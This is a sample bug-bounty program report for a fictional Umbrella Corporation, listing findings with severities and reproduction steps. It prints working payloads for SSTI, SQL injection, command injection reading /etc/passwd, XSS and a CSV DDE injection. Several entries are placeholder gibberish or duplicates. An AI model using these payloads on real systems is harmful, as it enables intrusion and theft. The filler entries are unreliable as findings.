Sample Report - Bug Bounty Program

Umbrella Corporation
Science for a comfortable life!
Umbrella - All Details

Bugcrowd Ongoing program results
Report created on May 01, 2019
Report date range: January 01, 2017 - December 01, 2025
Prepared by
[email protected]
Table of contents
1 Executive summary 3
2 Reporting and methodology 4
3 Targets and scope 5
4 Findings summary 6
5 Vulnerability details 10
6 Appendix 37
7 Closing statement 40
Bugcrowd Ongoing Program Results | Umbrella - All Details 2 of 41

Executive summary
Umbrella Corporation engaged Bugcrowd, Inc. to perform an This report is just a summary of the
Ongoing Bounty Program, commonly known as a crowd-sourced information available.
penetration test.
All details of the program's findings —
comments, code, and any researcher
An Ongoing Bounty Program is a cutting-edge approach to an provided remediation information —
application assessment or penetration test. Traditional penetration can be found in the Bugcrowd
tests use only one or two personnel to test an entire scope of work, Crowdcontrol platform.
while an Ongoing Bounty leverages a crowd of security researchers.
This increases the probability of discovering esoteric issues that
automated testing cannot find and that traditional vulnerability
assessments may miss in the same testing period.
The purpose of this engagement was to identify security

vulnerabilities in the targets listed in the targets and scope section.
Once identified, each vulnerability was rated for technical impact
defined in the findings summary section of the report.
This report shows testing for Umbrella Corporation's targets during

the period of: 01/01/2017 – 12/01/2025.
For this Ongoing Program, submissions were received from 4 unique

researchers.
The continuation of this document summarizes the findings, analysis,

and recommendations from the Ongoing Bounty Program performed
by Bugcrowd for Umbrella Corporation.

Reporting and methodology
Background
The strength of crowdsourced testing lies in multiple researchers, the pay-for-results model, and the
varied methodologies that the researchers implement. To this end, researchers are encouraged to use
their own individual methodologies on Bugcrowd Ongoing programs.
The workflow of every penetration test can be divided into the following four phases:
Bugcrowd researchers who perform web application testing and vulnerability assessment usually
subscribe to a variety of methodologies following the highlighted workflow, including the following:

Targets and scope
Scope All details of the program scope and full

program brief can be reviewed in the
Prior to the Ongoing program launching, Bugcrowd worked with Program Brief.
Umbrella Corporation to define the Rules of Engagement, commonly
known as the program brief, which includes the scope of work. The
following targets were considered explicitly in scope for testing:
Umbrella iOS App
Umbrella Android App
https://www.umbrella.corp/
*.umbrella.corp
api.umbrella.corp
https://google-gruyere.appspot.com

Findings summary
Findings by severity
The following chart shows all valid assessment findings from the program by technical severity.
18
16
14
Number of submissions
12
10
0
Critical High Medium Low
Technical severity

Risk and priority key
The following key is used to explain how Bugcrowd rates valid vulnerability submissions and their
technical severity. As a trusted advisor Bugcrowd also provides common "next steps" for program owners
per severity category.
TECHNICAL SEVERITY EXAMPLE VULNERABILITY TYPES
Critical Remote Code Execution

Vertical Authentication Bypass
Critical severity submissions (also known as "P1" or "Priority 1") are submissions that XML External Entities Injection
are escalated to Umbrella Corporation as soon as they are validated. These issues SQL Injection
warrant the highest security consideration and should be addressed immediately. Insecure Direct Object Reference for a critical
Commonly, submissions marked as Critical can cause financial theft, unavailability of function
services, large-scale account compromise, etc.
High Lateral authentication bypass

Stored Cross-Site Scripting
High severity submissions (also known as "P2" or "Priority 2") are vulnerability Cross-Site Request Forgery for a critical
submissions that should be slated for fix in the very near future. These issues still function
warrant prudent consideration but are often not availability or "breach level" Insecure Direct Object Reference for a
submissions. Commonly, submissions marked as High can cause account important function
compromise (with user interaction), sensitive information leakage, etc. Internal Server-Side Request Forgery
Medium Reflected Cross-Site Scripting with limited

impact
Medium severity submissions (also known as "P3" or "Priority 3") are vulnerability Cross-Site Request Forgery for a important
submissions that should be slated for fix in the major release cycle. These function
vulnerabilities can commonly impact single users but require user interaction to Insecure Direct Object Reference for an
trigger or only disclose moderately sensitive information. unimportant function
Low Cross-Site Scripting with limited impact

Cross-Site Request Forgery for an
Low severity submissions (also known as "P4" or "Priority 4") are vulnerability unimportant function
submissions that should be considered for fix within the next six months. These External Server-Side Request Forgery
vulnerabilities represent the least danger to confidentiality, integrity, and availability.
Informational Lack of code obfuscation

Autocomplete enabled
Informational submissions (also known as "P5" or "Priority 5") are vulnerability Non-exploitable SSL issues
submissions that are valid but out-of-scope or are "won’t fix" issues, such as best
practices.
Bugcrowd’s Vulnerability Rating Taxonomy
More detailed information regarding our vulnerability classification can be found at: https://bugcrowd.com/vrt

Findings table
The following table lists all valid assessment findings from the program:
TITLE VRT DUPLICATES PRIORITY STATE LINK
SSTI off of the ?name= variable Server-Side - P1 RESOLVED 

Injection
Default Credentials Server 1 P1 UNRESOLVED 

Security
Misconfiguration
SQL Injection (SQLi) Server-Side - P1 RESOLVED 

Injection
Markdown Injection (XSS) Server-Side - P1 RESOLVED 

Injection
adfa Sensitive Data - P1 RESOLVED 

Exposure
IDOR on bank.umrellafinancial.corp Broken - P1 RESOLVED 

Access
Control (BAC)
SQL Injection (SQLi) Server-Side - P1 UNRESOLVED 

Injection

Injection

Injection
IDOR on bank.umrellafinancial.corp Broken - P1 UNRESOLVED 

Access
Control (BAC)
klajdsfhlkasdhkfjhasdkljkdf Sensitive Data - P1 RESOLVED 

Exposure
adsfasdfadfa Server-Side - P1 RESOLVED 

Injection
Please Work Server-Side - P1 RESOLVED 

Injection

TITLE VRT DUPLICATES PRIORITY STATE LINK

Injection
SQL Injection (SQLi) Server-Side 2 P1 RESOLVED 

Injection
Command Injection Insecure - P1 UNRESOLVED 

OS/Firmware
Local File Inclusion in Templatize.asp Server-Side - P1 RESOLVED 

Script Injection
Test Server - P2 RESOLVED 

Security
Misconfiguration
Hardcoded Password on Umbrella Co Insecure - P2 UNRESOLVED 

ntainer OS/Firmware
[Requested] Denial of Service Application- - P3 RESOLVED 

Level Denial-
of-Service
(DoS)
CSRF on Change Password form Cross-Site - P3 UNRESOLVED 

Request
Forgery
(CSRF)
Command Injection Insecure - P3 UNRESOLVED 

OS/Firmware
Authentication Bypass on Lock Broken - P4 UNRESOLVED 

Authentication
and Session
Management
Telnet enabled on a Zombie Network - P4 UNRESOLVED 

Security
Misconfiguration
CSV Injection in RCPD Reports External - P5 RESOLVED 

Behavior

Vulnerability details
This section outlines the full submission data for each valid finding. These findings are unaltered from
their original state from the researcher. Due to the competitive nature and gamification of crowd-sourced
security assessments, some typos or grammar errors may occur. Each finding is headlined with the
submission title and priority followed by more detailed vulnerability information based on the type of
finding submitted. Several other fields may appear based on the context and VRT classification selected
by a researcher.
Such details may include the following:
Description:
This section appears above the "Reference Number" as a free form area for the researcher to describe
the context of the submission.
Reference number:
Submission unique Identifier visible to researchers.
VRT:
The Vulnerability Rating Taxonomy is the baseline guide used for classifying technical severity.
Bug URL:
This is the full URL/URI of where the vulnerability took place.
Extra info:
A free form area for the researcher to add additional information to the submission.
HTTP request:
This is a text block with the full HTTP(S) request that triggered the vulnerability, including all its
associated headers and cookie information.
CVSS rating
The CVSS vector string for this submission, if provided, and the score calculated from that vector string.
Additional details:
Several other fields may appear based on the context and VRT classification selected by a researcher.
Bugcrowd ASE curated proof of concepts, comments to the researcher or Bugcrowd (public or private),
assignees, attachments, and state change metadata is available in the Crowdcontrol Platform.

SSTI off of the ?name= variable P1
PortSwigger Web Security Blog // Wednesday, August 5, 2015 // Server-Side Template Injection
Template engines are widely used by web applications to present dynamic data via web pages and
emails. Unsafely embedding user input in templates enables Server-Side Template Injection, a
frequently critical vulnerability that is extremely easy to mistake for Cross-Site Scripting (XSS), or
miss entirely. Unlike XSS, Template Injection can be used to directly attack web servers' internals
and often obtain Remote Code Execution (RCE), turning every vulnerable application into a
potential pivot point.
Template Injection can arise both through developer error, and through the intentional exposure of
templates in an attempt to offer rich functionality, as commonly done by wikis, blogs, marketing
applications and content management systems. Intentional template injection is such a common
use-case that many template engines offer a 'sandboxed' mode for this express purpose. This paper
defines a methodology for detecting and exploiting template injection, and shows it being applied to
craft RCE zerodays for two widely deployed enterprise web applications. Generic exploits are
demonstrated for five of the most popular template engines, including escapes from sandboxes
whose entire purpose is to handle user-supplied templates in a safe way.
Twig is popular PHP templating language. It has restrictions similar to Smarty's secure mode by
default, with a couple of significant additional limitations - it isn't possible to call static methods, and
the return values from all functions are cast to strings. This means we can't use functions to obtain
object references BUT Twig has documented its self object (_self) so we don't need to bruteforce
any variable names.
Executing arbitrary shell commands is thus just a matter of registering exec as a filter callback, then
invoking getFilter:
{{_self.env.registerUndefinedFilterCallback(""exec"")}}{{_self.env.getFilter(""cat /etc/passwd"")}}
Reference number:
69de73b74a86f174c08453044c0cf0a43f8f7ded460a101f23b07efc97959e0e
VRT:
Server-Side Injection > Remote Code Execution (RCE)
CVSS rating:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H [9.8]

Bug URL:
https://testasp.umbrella.corp
Extra info:
Go to this URL, see the output of /etc/passwd returned in the response:
http://testasp.vulnweb.com/?
name=xiddahj%20is%20a%20baller%20here%20is%20yo%20etc%20passwd%20%7B%7B_self.en
v.registerUndefinedFilterCallback%28%22exec%22%29%7D%7D%7B%7B_self.env.getFilter%28%
22cat+%2Fetc%2Fpasswd%22%29%7D%7D&submit=

Default Credentials P1
In this particular instance, I was able to log into Umbrella's globalPatient server. I was able to
look at every Patient record sent to each division's 8 scientists.
Steps to Reproduce
1. Access the global Umbrella Patient server.

2. On the login screen, enter admin for the username and admin for the password.
3. After authentication, you should be logged into into the server as an administrator.
Reference number:
74270ff88764c6862c0c9623e8c879c5c67ee1f06c92e86c2385f66663efc5c0
VRT:
Server Security Misconfiguration > Using Default Credentials > Production Server
CVSS rating:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L [9.4]
Bug URL:
https://patient.umbrella.corp/serv/admin

SQL Injection (SQLi) P1
Navigate to https://www.umbrella.corp/raccoon/tvirus.php and click any of the articles. Note the ID

parameter in the URL query string. Change the value to the below attack string and send it.
Attack String:
1%20UNION%20ALL%20SELECT%20VERSION(),%20USER(),%20NULL
Reference number:
6f0d1bb2b2e9c166f0a86e908041f8bd5252c508b728c6638c49e2ff890518d2
VRT:
Server-Side Injection > SQL Injection
CVSS rating:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N [8.2]
HTTP request:
GET /raccoon/tvirus.php?id=1%20UNION%20ALL%20SELECT%20VERSION(),%20USER(),%20NULL HTTP/1.1
Host: www.umbrella.corp
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/53.0.2785.143 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: __cfduid=d9fed61d7b68255a865c03f0f5f73768d1475534244
Connection: close

Markdown Injection (XSS) P1
First I tried to send a simple HTML body to see if it's interpreted but without success.
I also tried a simple payload using [link](<script>alert(1)</script>) but apparently the script tag is not
interpreted neither. Lastly I tried the old trick we used to solve the Mitsune challenge: we used a
base64 payload and the content-type base64 to let the javascript handle the decoding and the
execution. I crafted a new markdown link entity, containing the following payload:
[clickme](data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pgo=)
and I generated a new paste. Clicking on the link I finally got an alert, confirming that my payload
was working.
Some time after I found and reported the vulnerability I finally received an email from the pastebin
administrators claiming that they patched it.
I gave it a look and found that they blocked the data entity and my old PoC was no longer working.
To confirm that the problem was solved I created another paste with a simpler payload
[totallyharmlesslink](javascript:window.onerror=alert;throw%201)
and, again, I got an alert :D
Reference number:
e4bd14aa0c80bd0046a722012f3652bad0dd5a08d22270f786154e816903b520
VRT:
Server-Side Injection > File Inclusion > Local
CVSS rating:

adfa P1
asdfafd
Reference number:
3a84221683879a30d90adbabbfdbd9e8a81674b87ed8471d8ea7f43414cabb30
VRT:
Sensitive Data Exposure > Critically Sensitive Data > Password Disclosure
CVSS rating:
Bug URL:
afdafd
Extra info:
adsf
HTTP request:
adsfa

IDOR on bank.umrellafinancial.corp P1
I was able to look at any user's personal banking details including their checking and savings
accounts, personal loans, and credit details.
Steps to Reproduce
1. Log into the Umbrella Bank as your @bugcrowdninja.com username.
2. Navigate to the Account details page.
3. Notice that there is an id parameter in the query string.
4. Attach this id parameter into the query string of any page that you would like to access as a different
user.
5. Change id parameter into a different number other than your own account on the checking account
page.
6. You will now be looking at another Iron Bank user's account details and see another user's gold,
bitcoin, and ethereum holdings.
Reference number:
84cbd041769d6af6698fc52ba1e7a931c978a1d1e9325a512353d4233e817320
VRT:
Broken Access Control (BAC) > Insecure Direct Object References (IDOR)
CVSS rating:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N [7.5]
Bug URL:
https://bank.umbrellafinancial.corp/
Extra info:
Insecure Direct Object References allow attackers to bypass authorization and access resources
directly by modifying the value of a parameter used to directly point to an object. Such resources
can be database entries belonging to other users, files in the system, and more. This is caused by
the fact that the application takes user supplied input and uses it to retrieve an object without
performing sufficient authorization checks.


Attack String: 1%20UNION%20ALL%20SELECT%20VERSION(),%20USER(),%20NULL
Reference number:
3fae827f490089558f18df686d4d62f1d1d30a21befeb4161e63f9c1e3ab083e
VRT:
CVSS rating:
Bug URL:
https://www.umbrella.corp/raccoon/tvirus.php?
id=1%20UNION%20ALL%20SELECT%20VERSION(),%20USER(),%20NULL
HTTP request:
Connection: close


Attack String:
1%20UNION%20ALL%20SELECT%20VERSION(),%20USER(),%20NULL
Reference number:
3fd4ad3e3eb2c2ee4c25455dfb6cb6ac1567d8dc4bad54717ffb13d02b288531
VRT:
Server-Side Injection > SQL Injection > Error-Based
CVSS rating:
Bug URL:
HTTP request:
Connection: close


Reference number:
8d42fec46887d43bf79b573766aab72784cd02bd4a87dc715ea9459f6071baa7
VRT:
CVSS rating:
Bug URL:
HTTP request:
Connection: close

IDOR on bank.umrellafinancial.corp P1
I was able to look at any user's personal banking details including their checking and savings
accounts, personal loans, and credit details.
Steps to Reproduce
1. Log into the Umbrella Bank as your @bugcrowdninja.com username.

2. Navigate to the Account details page.
3. Notice that there is an id parameter in the query string.
4. Attach this id parameter into the query string of any page that you would like to access as a
different user.
5. Change id parameter into a different number other than your own account on the checking account
page.
6. You will now be looking at another Iron Bank user's account details and see another user's gold,
bitcoin, and ethereum holdings.
Reference number:
f37b64f1775741075e94f9a10e7c79faff960d8973ae31a3641a2e6416299fd9
VRT:
Broken Access Control (BAC) > Insecure Direct Object References (IDOR)
CVSS rating:
CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N [6.5]
Bug URL:
https://bank.umbrellafinancial.corp/
Extra info:
Insecure Direct Object References allow attackers to bypass authorization and access resources
directly by modifying the value of a parameter used to directly point to an object. Such resources
can be database entries belonging to other users, files in the system, and more. This is caused by
the fact that the application takes user supplied input and uses it to retrieve an object without
performing sufficient authorization checks.

klajdsfhlkasdhkfjhasdkljkdf P1
akdfkajhdf;l
Reference number:
4330908750d924f20bcb7a1e55e7858e4ff67a9f228673c9fda7c26e1afc55e1
VRT:
Sensitive Data Exposure > Critically Sensitive Data > Private API Keys
CVSS rating:
Bug URL:
akljhdfkla;hdlk
Extra info:
;kasdjflka
HTTP request:
akldfklaj

adsfasdfadfa P1
asdfadf
Reference number:
7f02854954c31e086f4d160f17cdf95ee4d03f69c2a56db675c355ff3710bdfe
VRT:
CVSS rating:
Bug URL:
asdfadfa
Extra info:
adsfa
HTTP request:
asdfasdasf

Please Work P1
WOrk Plese
Reference number:
25351f9610e39fdacc8ce2d6b2bed72b745e753d14bcbab6c111df637cc16171
VRT:
CVSS rating:
Bug URL:
Work Please
Extra info:
Blah
HTTP request:
U gh


Reference number:
6f6c6913469e030fabea8a6b2dc84fca029dd39ee07f49352423df58b1e06d8e
VRT:
CVSS rating:
Bug URL:
HTTP request:
Connection: close


Reference number:
446adef0bf0bf9582b53587198792f6f4c0d5115c60dbdabc36aae339532a72a
VRT:
CVSS rating:
Bug URL:
HTTP request:
Connection: close

Command Injection P1
Some applications use operating system commands to execute certain functionalities by using bad
coding practices, say for instance, usage of functions such as system(),shell_exec(), etc. This allows
a user to inject arbitrary commands that will execute on the remote host with the privilege of web
server user. An attacker can trick the interpreter to execute his desired commands on the system.
Reference number:
e9b5b3a0b7046142e5178ef4059945abdec8be788c0cd8a091d55b27b93b596c
VRT:
Insecure OS/Firmware > Command Injection
CVSS rating:
Bug URL:
http://xvwa.umbrella.corp/xvwa/vulnerabilities/cmdi/
HTTP request:
GET /xvwa/vulnerabilities/cmdi/?target=127.0.0.1%3B+cat+%2Fetc%2Fpasswd HTTP/1.1
Host: xvwa.umbrella.corp
Cookie: PHPSESSID=sqofpfkv85t2q2qgvsvall3e12
Referer: http://xvwa.samsclass.info/xvwa/vulnerabilities/cmdi/?
target=127.0.0.1%3B+cat+%2Fetc%2Fpasswd
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/51.0.2704.103 Safari/537.36

Local File Inclusion in Templatize.asp Script P1
This site is subject to a local file inclusion bug. The Templatize.asp script will display the source
code of any referenced script. Here I've had Templatize.asp fetch the server side source code of the
Login.asp page.
Reference number:
fda36f30a7da06077d6fcc5eae836f4a0cd307154f9c504b6c7256b07807c5b7
VRT:
CVSS rating:
Bug URL:
http://testasp.umbrella.corpTemplatize.asp?item=Login.asp
HTTP request:
GET /Templatize.asp?item=Login.asp HTTP/1.1
Host: testasp.umbrella.corp
Accept: */*
Referer: http://127.0.0.1:8000/
Chrome/51.0.2704.103 Safari/537.36

Test P2
TEST
Reference number:
033a18642a02b3fae571677c36fb111940c36de2ced68af5332c087b2157cce7
VRT:
Server Security Misconfiguration
CVSS rating:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N [0.0]
Bug URL:
TeST
Extra info:
TEST
HTTP request:
TEST

Hardcoded Password on Umbrella Container P2
I was able to find a hardcoded password of the Umbrella Container that I was assigned to as a
researcher. I disassembled the container and I was able to find a JTAG interface. From there, I was
able to access the on board operating system and started poking around. I found source code within
the file system which the container uses to run through its interpreter. In that source code was a
hardcoded username of leon and password of kennedy.
Steps to Reproduce:
1. Access the onboard operating system using the `JTAG` interface on the T-Virus Container
.
2. Run the command `ls /etc/config/umbrella/container/` and notice that there is a file ca
lled `access.py`.
3. Next, run the commands `grep 'username' /etc/config/umbrella/container/access.py` and `
grep 'passwd' /etc/umbrella/container/access.py`.
4. You will see that the commands will return with the strings `leon` and `kennedy`.
Reference number:
20d0b6c1d3017243fd54ebce2bf6fffd68bb7447c7c138f0a6fd4fdfc0a2cc38
VRT:
Insecure OS/Firmware > Hardcoded Password > Non-Privileged User
CVSS rating:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N [6.5]
Bug URL:
/etc/umbrella/container/tvirus/access.py

[Requested] Denial of Service P3
In this particular instance, I was able to very easily attack the web application with a small DDoS
attack. I did this because I was not challenged enough at my job at Initech. This made it so I didn't
have to do work.
Steps to Reproduce
1. Access the vulnerable URL on the Biohazard - Contact Us.

2. Fill out all the details of the Contact Us form.
3. Get the POST request and run it through Burp Sequencer.
4. After a few hundred requests, try accessing the Biohazard website again.
5. You'll notice that the website will not load.
Reference number:
03bc31c35452ea76d319231e639fc3bde227a4f7857d1e3b5a7972d2bb6fa678
VRT:
Application-Level Denial-of-Service (DoS) > High Impact and/or Medium Difficulty
CVSS rating:
CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H [5.9]
Bug URL:
https://biohazard.io/contact

CSRF on Change Password form P3
CSRF exists on the change password functionality.
Reference number:
bfe9ba796ff3391f374d5fc42d8d44133eb1fd3d03da05d4d4add8aba80dbcb3
VRT:
Cross-Site Request Forgery (CSRF) > Action-Specific > Authenticated Action
CVSS rating:
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N [7.1]
Bug URL:
http://xvwa.umbrella.corp/xvwa/vulnerabilities/csrf/
Extra info:
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted
actions on a web application in which they're currently authenticated. CSRF attacks specifically
target state-changing requests, not theft of data, since the attacker has no way to see the response
to the forged request. With a little help of social engineering (such as sending a link via email or
chat), an attacker may trick the user to change their password. If the victim is a normal user, a
successful CSRF attack can force the user to perform state changing requests like the password
change. If the victim is an administrative account, CSRF can compromise the entire web application
with this.
HTTP request:
GET /xvwa/vulnerabilities/csrf/?passwd=a&confirm=a&submit=submit HTTP/1.1
Host: xvwa.umbrella.corp
Chrome/51.0.2704.103 Safari/537.36
Referer: http://xvwa.samsclass.info/xvwa/vulnerabilities/csrf/
Cookie: PHPSESSID=t689ma89rbem5fpmqcpdbam8g5

Command Injection P3
Some applications use operating system commands to execute certain functionalities by using bad
coding practices, say for instance, usage of functions such as system(),shell_exec(), etc. This allows
a user to inject arbitrary commands that will execute on the remote host with the privilege of web
server user. An attacker can trick the interpreter to execute his desired commands on the system.
Reference number:
235d64113b52d34656d02753dd095643a766b8ef18ffdbaa15ec4fab91d434b0
VRT:
Insecure OS/Firmware > Command Injection
CVSS rating:
Bug URL:
https://www.umbrella.corp/xvwa/vulnerabilities/cmdi/
HTTP request:
GET /xvwa/vulnerabilities/cmdi/?target=127.0.0.1%3B+cat+%2Fetc%2Fpasswd HTTP/1.1
Cookie: PHPSESSID=sqofpfkv85t2q2qgvsvall3e12
Referer: http://xvwa.samsclass.info/xvwa/vulnerabilities/cmdi/?
target=127.0.0.1%3B+cat+%2Fetc%2Fpasswd
Chrome/51.0.2704.103 Safari/537.36

Authentication Bypass on Lock P4
It is possible to bypass the authentication of the Arklay Laboratory that contains viral and biological
weapons. Jill Valentine was able to successfully bypass all the physical locks as she has a lock pick.
Steps to Reproduce:
1. Be Jill Valentine.
2. Use your lock pick on the lock.
3. Profit.
Reference number:
f8cc7d4df9fd159ebbea5073027e1e17e9ccb5a36797195e381b17a74a52803c
VRT:
Broken Authentication and Session Management > Authentication Bypass
CVSS rating:
Bug URL:
Arklay Laboratory beneath Spencer Mansion

Telnet enabled on a Zombie P4
Doing a port scan of a Zombie revealed that there is an open Telnet interface.
Reference number:
8747f2958263f644379d123b7cb5b8cb73abf5de5d160164aae7c40b9104cb6d
VRT:
Network Security Misconfiguration > Telnet Enabled > Credentials Required
CVSS rating:
CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N [4.6]
Bug URL:
Any Zombie

CSV Injection in RCPD Reports P5
I was able to find a parameter that was taking input that would put that same input into a CSV. This
allowed me to craft a malicious injection which when opened on a victim's computer, would execute
commands.
Steps to Reproduce
1. Access the vulnerable URL on the RCPD report web app.

2. Create a new police report.
3. Within the web app, enter in=DDE(""cmd"";""/C calc"";""__DdeLink_60_870516294"")
into one of the fields.
4. Save the file and there should be a link that gets created so that anyone from the company can view
the RCPD report.
5. Have a victim open the link which prompts them for a download of the CSV.
6. Now when they open the file in their CSV viewer, it will execute the command to open the
calculator.
Reference number:
01e2dfb58cd3ddc12794696bf79304dc12e37df2b924330b8671dc4dbc40812b
VRT:
External Behavior > CSV Injection
CVSS rating:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N [0.0]
Bug URL:
https://raccoon.city/reports/

Appendix
Included in this appendix are auxiliary metrics and insights into the Ongoing program. This includes
information regarding submissions over time, payouts and prevalent issue types.
Submissions over time
The timeline below shows submissions received and validated by the Bugcrowd team:
Submissions Over Time

validated
received
24
22
20
18
16
14
12
10
8
6
4
2
0
11-28 01-19 03-12 05-03 06-24 08-15 10-06 11-27 01-18 03-11
Submissions signal
A total of 41 submissions were received, with 25 unique valid issues discovered. Bugcrowd identified 3
duplicate submissions, removed 4 invalid submissions, and is processing 9 submissions. The ratio of
unique valid submissions to noise was 78%.
SUBMISSION OUTCOME COUNT

Ratio of Unique Valid Submissions to Noise
Valid 25
100%
Invalid 4 78%
75%
Duplicate 3
50%
Processing 9 25%
Total 41 0%

Bug types overview
This distribution across bug types for the Ongoing program only includes unique and valid submissions.
Server-Side Injection Insecure OS/Firmware Sensitive Data Exposure Server Security Misconfiguration
Broken Access Control (BAC) Application-Level Denial-of-Service (DoS) External Behavior
Network Security Misconfiguration Cross-Site Request Forgery (CSRF) Broken Authentication and Session Management

Spend of program rewards pool
During this Ongoing program, about 30% of the total allocated reward pool of $100,000 was paid. A
number of other statistics regarding the Ongoing program's payouts are shown below.
$30,450.00 $69,550.00
Total Paid Out to Researchers Remaining Prize Pool
$3,000.00 $50.00 $1,323.91

Highest Paid Reward Lowest Paid Reward Average Reward
Top 3 highest paid submissions
TITLE REWARD
adsfasdfadfa $3,000.00
7f02854954c31e086f4d160f17cdf95ee4d03f69c2a56db675c355ff3710bdfe
SQL Injection (SQLi) $2,000.00

6f0d1bb2b2e9c166f0a86e908041f8bd5252c508b728c6638c49e2ff890518d2
SQL Injection (SQLi) $2,000.00

d277fcc1536066bb473c565a849ff416ecb58d3b21a96cb91764ec5c2a16a415

Closing statement
May 01, 2019
Bugcrowd Inc.
921 Front St
Suite 100
San Francisco, CA 94111
Introduction
This report shows testing of Umbrella Corporation between the dates of 01/01/2017 - 12/01/2025.
During this time, 4 researchers from Bugcrowd submitted a total of 41 vulnerability submissions against
Umbrella Corporation’s targets. The purpose of this assessment was to identify security issues that
could adversely affect the integrity of Umbrella Corporation. Testing focused on the following:
1. Umbrella iOS App

2. Umbrella Android App
3. https://www.umbrella.corp/
4. *.umbrella.corp
5. api.umbrella.corp
6. https://google-gruyere.appspot.com
The assessment was performed under the guidelines provided in the statement of work between
Umbrella Corporation and Bugcrowd. This letter provides a high-level overview of the testing performed,
and the result of that testing.
Ongoing Program Overview
An Ongoing Program is a novel approach to a penetration test. Traditional penetration tests use only one
or two researchers to test an entire scope of work, while an Ongoing Program leverages a crowd of
security researchers. This increases the probability of discovering esoteric issues that automated testing
cannot find and that traditional vulnerability assessments may miss, in the same testing period.
It is important to note that this document represents a point-in-time evaluation of security posture.
Security threats and attacker techniques evolve rapidly, and the results of this assessment are not
intended to represent an endorsement of the adequacy of current security measures against future
threats. This document contains information in summary form and is therefore intended for general
guidance only; it is not intended as a substitute for detailed research or the exercise of professional
judgment. The information presented here should not be construed as professional advice or service.
Testing Methods
This security assessment leveraged researchers that used a combination of proprietary, public,
automated, and manual test techniques throughout the assessment. Commonly tested vulnerabilities
include code injection, cross-site request forgery, cross-site scripting, insecure storage of sensitive data,
authorization/authentication vulnerabilities, business logic vulnerabilities, and more.
Summary of Findings

During the engagement, Bugcrowd discovered the following:
COUNT TECHNICAL SEVERITY
17 Critical vulnerabilities
2 High vulnerabilities
3 Medium vulnerabilities
2 Low vulnerabilities
1 Informational finding

Sample Report - Bug Bounty Program

Uploaded by

Copyright:

Available Formats

Sample Report - Bug Bounty Program

Uploaded by

Document Information

Original Description:

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Sample Report - Bug Bounty Program

Uploaded by

Copyright:

Available Formats

Umbrella Corporation

Science for a comfortable life!

Umbrella - All Details

Report created on May 01, 2019

Report date range: January 01, 2017 - December 01, 2025

2 Reporting and methodology 4

3 Targets and scope 5

Bugcrowd Ongoing Program Results | Umbrella - All Details 2 of 41

The purpose of this engagement was to identify security

This report shows testing for Umbrella Corporation's targets during

For this Ongoing Program, submissions were received from 4 unique

The continuation of this document summarizes the findings, analysis,

Bugcrowd Ongoing Program Results | Umbrella - All Details 3 of 41

Bugcrowd Ongoing Program Results | Umbrella - All Details 4 of 41

Scope All details of the program scope and full

Umbrella iOS App

Umbrella Android App

Bugcrowd Ongoing Program Results | Umbrella - All Details 5 of 41

Bugcrowd Ongoing Program Results | Umbrella - All Details 6 of 41

TECHNICAL SEVERITY EXAMPLE VULNERABILITY TYPES

Critical Remote Code Execution

High Lateral authentication bypass

Medium Reflected Cross-Site Scripting with limited

Low Cross-Site Scripting with limited impact

Informational Lack of code obfuscation

Bugcrowd’s Vulnerability Rating Taxonomy

Bugcrowd Ongoing Program Results | Umbrella - All Details 7 of 41

TITLE VRT DUPLICATES PRIORITY STATE LINK

SSTI off of the ?name= variable Server-Side - P1 RESOLVED 

Default Credentials Server 1 P1 UNRESOLVED 

SQL Injection (SQLi) Server-Side - P1 RESOLVED 

Markdown Injection (XSS) Server-Side - P1 RESOLVED 

adfa Sensitive Data - P1 RESOLVED 

IDOR on bank.umrellafinancial.corp Broken - P1 RESOLVED 

SQL Injection (SQLi) Server-Side - P1 UNRESOLVED 

SQL Injection (SQLi) Server-Side - P1 RESOLVED 

SQL Injection (SQLi) Server-Side - P1 RESOLVED 

IDOR on bank.umrellafinancial.corp Broken - P1 UNRESOLVED 

klajdsfhlkasdhkfjhasdkljkdf Sensitive Data - P1 RESOLVED 

adsfasdfadfa Server-Side - P1 RESOLVED 

Please Work Server-Side - P1 RESOLVED 

Bugcrowd Ongoing Program Results | Umbrella - All Details 8 of 41

SQL Injection (SQLi) Server-Side - P1 RESOLVED 

SQL Injection (SQLi) Server-Side 2 P1 RESOLVED 

Command Injection Insecure - P1 UNRESOLVED 

Local File Inclusion in Templatize.asp Server-Side - P1 RESOLVED 

Test Server - P2 RESOLVED 

Hardcoded Password on Umbrella Co Insecure - P2 UNRESOLVED 

